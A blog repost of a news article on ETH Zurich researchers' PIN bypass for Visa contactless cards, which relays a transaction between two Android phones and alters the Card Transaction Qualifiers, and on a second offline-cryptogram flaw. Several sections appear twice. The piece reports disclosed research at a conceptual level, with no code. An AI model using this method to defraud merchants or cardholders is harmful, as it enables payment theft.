Skip to main content

The PIN is useless in Visa contactless transactions

Academics bypass PINs for Visa contactless payments

By- Aarti Jatan

Researchers: "In other words, the PIN is useless in Visa contactless transactions."


VISA contactless


A team of academics from Switzerland has discovered a security bug that can be abused to bypass PIN codes for Visa contactless payments.

This means that if criminals are ever in possession of a stolen Visa contactless card, they can use it to pay for expensive products, above the contactless transaction limit, and without needing to enter the card's PIN code.

The attack is extremely stealthy, academics said, and can be easily mistaken for a customer paying for products using a mobile/digital wallet installed on their smartphone.

However, in reality, the attacker is actually paying with data received from a (stolen) Visa contactless card that is hidden on the attacker's body.


HOW THE ATTACK WORKS

According to the research team, a successful attack requires four components: (1+2) two Android smartphones, (3) a special Android app developed by the research team, and (4) a Visa contactless card.

The Android app is installed on the two smartphones, which will work as a card emulator and a POS (Point-Of-Sale) emulator.

visa-contactless-attack.jpg


The phone that emulates a POS device is put close to the stolen card, while the smartphone working as the card emulator is used to pay for goods.

The entire idea behind the attack is that the POS emulator asks the card to make a payment, modifies transaction details, and then sends the modified data via WiFi to the second smartphone that makes a large payment without needing to provide a PIN (as the attacker has modified the transaction data to say that the PIN is not needed).

"Our app does not require root privileges or any fancy hacks to Android and we have successfully used it on Pixel and Huawei devices," researchers said.


ATTACK CAUSED BY AN ISSUE WITH THE VISA CONTACTLESS PROTOCOL

At the technical level, the researchers said the attack is possible because of what they describe as design flaws in the EMV standard and in Visa's contactless protocol.

These issues allow an attacker to alter data involved in a contactless transaction, including the fields that control transaction details and if the card owner has been verified.

"The cardholder verification method used in a transaction, if any, is neither authenticated nor cryptographically protected against modification," researchers said.

"The attack consists in a modification of a card-sourced data object –the Card Transaction Qualifiers– before delivering it to the terminal," they added.

"The modification instructs the terminal that: (1) PIN verification is not required, and (2) the cardholder was verified on the consumer's device (e.g., a smartphone)."

These modifications are carried out on the smartphone running the POS emulator, before being sent to the second smartphone, and then relayed to the actual POS device, which wouldn't be able to tell if the transaction data was modified.

This security issue was discovered earlier this year by academics from the Swiss Federal Institute of Technology (ETH) in Zurich.

ETH Zurich researchers said they tested their attack in the real world, in real stores, without facing any issues. The attack was successful at bypassing PINs on Visa Credit, Visa Electron, and VPay cards, they said.

A Visa spokesperson did not return an email seeking comment on the research paper's findings, which ZDNet sent on Thursday, but the ETH Zurich team said they notified Visa of their findings.


SECOND ATTACK DISCOVERED, ALSO IMPACTING MASTERCARD

To discover this bug, the research team said they used a modified version of a tool called Tamarin, which was previously used to discover complex vulnerabilities in the TLS 1.3 cryptographic protocol [PDF] and in the 5G authentication mechanism [PDF].

Besides the PIN bypass on Visa contactless cards, the same tool also discovered a second security issue, this time impacting both Mastercard and Visa. Researchers explain:

"Our symbolic analysis also reveals that, in an offline contactless transaction with a Visa or an old Mastercard card, the card does not authenticate to the terminal the ApplicationCryptogram (AC), which is a card-produced cryptographic proof of the transaction that the terminal cannot verify (only the card issuer can). This enables criminals to trick the terminal into accepting an unauthentic offline transaction. Later on, when the acquirer submits the transaction data as part of the clearing record, the issuing bank will detect the wrong cryptogram, but the criminal is already long gone with the goods."

Unlike the first bug, the research team said it did not test this second attack in real-world setups for ethical reasons, as this would have defrauded the merchants.

Additional details about the team's research can be found in a paper preprint entitled "The EMV Standard: Break, Fix, Verify." Researchers are also scheduled to present their findings at the IEEE Symposium on Security and Privacy, next year, in May 2021.


ATTACK CAUSED BY AN ISSUE WITH THE VISA CONTACTLESS PROTOCOL

At the technical level, the researchers said the attack is possible because of what they describe as design flaws in the EMV standard and in Visa's contactless protocol.

These issues allow an attacker to alter data involved in a contactless transaction, including the fields that control transaction details and if the card owner has been verified.

"The cardholder verification method used in a transaction, if any, is neither authenticated nor cryptographically protected against modification," researchers said.

"The attack consists in a modification of a card-sourced data object –the Card Transaction Qualifiers– before delivering it to the terminal," they added.

"The modification instructs the terminal that: (1) PIN verification is not required, and (2) the cardholder was verified on the consumer's device (e.g., a smartphone)."

These modifications are carried out on the smartphone running the POS emulator, before being sent to the second smartphone, and then relayed to the actual POS device, which wouldn't be able to tell if the transaction data was modified.

This security issue was discovered earlier this year by academics from the Swiss Federal Institute of Technology (ETH) in Zurich.

ETH Zurich researchers said they tested their attack in the real world, in real stores, without facing any issues. The attack was successful at bypassing PINs on Visa Credit, Visa Electron, and VPay cards, they said.

A Visa spokesperson did not return an email seeking comment on the research paper's findings, which ZDNet sent on Thursday, but the ETH Zurich team said they notified Visa of their findings.


SECOND ATTACK DISCOVERED, ALSO IMPACTING MASTERCARD

To discover this bug, the research team said they used a modified version of a tool called Tamarin, which was previously used to discover complex vulnerabilities in the TLS 1.3 cryptographic protocol [PDF] and in the 5G authentication mechanism [PDF].

Besides the PIN bypass on Visa contactless cards, the same tool also discovered a second security issue, this time impacting both Mastercard and Visa. Researchers explain:

"Our symbolic analysis also reveals that, in an offline contactless transaction with a Visa or an old Mastercard card, the card does not authenticate to the terminal the ApplicationCryptogram (AC), which is a card-produced cryptographic proof of the transaction that the terminal cannot verify (only the card issuer can). This enables criminals to trick the terminal into accepting an unauthentic offline transaction. Later on, when the acquirer submits the transaction data as part of the clearing record, the issuing bank will detect the wrong cryptogram, but the criminal is already long gone with the goods."

Unlike the first bug, the research team said it did not test this second attack in real-world setups for ethical reasons, as this would have defrauded the merchants.

Additional details about the team's research can be found in a paper preprint entitled "The EMV Standard: Break, Fix, Verify." Researchers are also scheduled to present their findings at the IEEE Symposium on Security and Privacy, next year, in May 2021.


Labels:

Comments

Post a Comment

Popular posts from this blog

Student surprise: Malware masked as textbooks and essays

Student surprise: Malware masked as textbooks and essays By- Kaspersky Malware can masquerade not only as games and TV shows, but also as educational materials. We help you understand what this malware is and how to avoid being infected. It is far too easy to pick up nasty stuff when you try to download   popular TV shows   or   game cheats . However, cybercriminals do not limit themselves to tainting entertainment; you can also stumble upon a virus when looking for work- or study-related materials. This is particularly important to keep in mind as the academic year starts, because the cost of textbooks and other materials for K–12 and college students often leads to many looking for more affordable and free alternatives online. Download an essay, get some malware thrown in Wanting to find out how frequently malicious content is encountered among materials that are posted for free access, we checked how many infections Kaspersky solutions identified in files with school- ...
1 comment
Read more

10 tips for Zoom security and privacy

10 tips for Zoom security and privacy By- Aarti Jatan Gain full control over your Zoom video conferences, family gatherings, and online bar crawls . With social distancing and quarantine measures implemented around the globe, people quickly started searching for effective means of communicating with each other. With its reported ease of use and attractive pricing, Zoom quickly rose in popularity — and people quickly figured out that Zoom’s developers weren’t fully prepared for the level of scrutiny it would receive. With so much use, Zoom’s flaws came rapidly to light. The company handled the tremendous increase of workload seamlessly and quickly reacted to security researchers’ discoveries. However, just like with each and every service, code updates will not address every complaint, but some issues are very much worth keeping in mind. So, here we offer 10 security and privacy tips for Zoom users. 1. Protect your account A Zoom account is just another account, and in setting yours up,...
Post a Comment
Read more

Woman dies during a Ransomware attack on a German hospital

Woman dies during a Ransomware attack on a German hospital It could be the first death directly linked to a cybersecurity attack A woman in Germany died during a ransomware attack on the Duesseldorf University Hospital, in what may be the first death directly linked to a cyberattack on a hospital. The hospital couldn’t accept emergency patients because of the attack, and the woman was sent to a health care facility around 20 miles away, the Associated Press reported. The cyberattack was not intended for the hospital, according to a report from the German news outlet RTL. The ransom note was addressed to a nearby university. The attackers stopped the attack after authorities told them it had actually shut down a hospital. Health care facilities are one of the biggest targets for cyberattacks, and cybersecurity experts have warned for years that most hospitals aren’t prepared . They rely heavily on devices, like radiology equipment, that are often connected to the internet. Without those...
Post a Comment
Read more